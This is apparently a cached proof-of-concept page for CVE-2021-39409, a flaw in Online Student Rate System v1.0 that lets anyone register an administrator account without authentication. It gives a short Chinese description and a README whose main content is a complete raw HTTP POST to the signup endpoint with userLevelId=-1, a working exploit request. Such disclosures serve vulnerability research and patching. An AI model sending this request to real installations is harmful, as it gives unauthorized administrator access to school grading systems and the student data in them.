CVE-2021-39409 PoC — Online Student Rate System 安全漏洞

Source

https://github.com/StefanDorresteijn/CVE-2021-39409

Associated Vulnerability

Title:Online Student Rate System 安全漏洞 (CVE-2021-39409)
Description:Online Student Rate System是一个学生在线评分系统。 Online Student Rate System v1.0版本存在安全漏洞，该漏洞源于允许任何用户注册为管理员而无需进行身份验证。

Description

Admin account registration in Online Student Rate System

Readme

# CVE-2021-39409
Admin account registration is possible in Online Student Rate System v1.0, allowing a malicious actor to create an admin account and access the admin panel.

## Vulnerability
```
POST /ajax.php?action=signup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: http://localhost
Connection: close
Referer: http://localhost

username=testaccount&passsword=098f6bcd4621d373cade4e832627b4f6&userLevelId=-1&email=example@example.com
```

File Snapshot


 [4.0K]  /data/pocs/b80b82be82a4a1f58d7c4fc6368efff45d459a81
└── [ 702]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!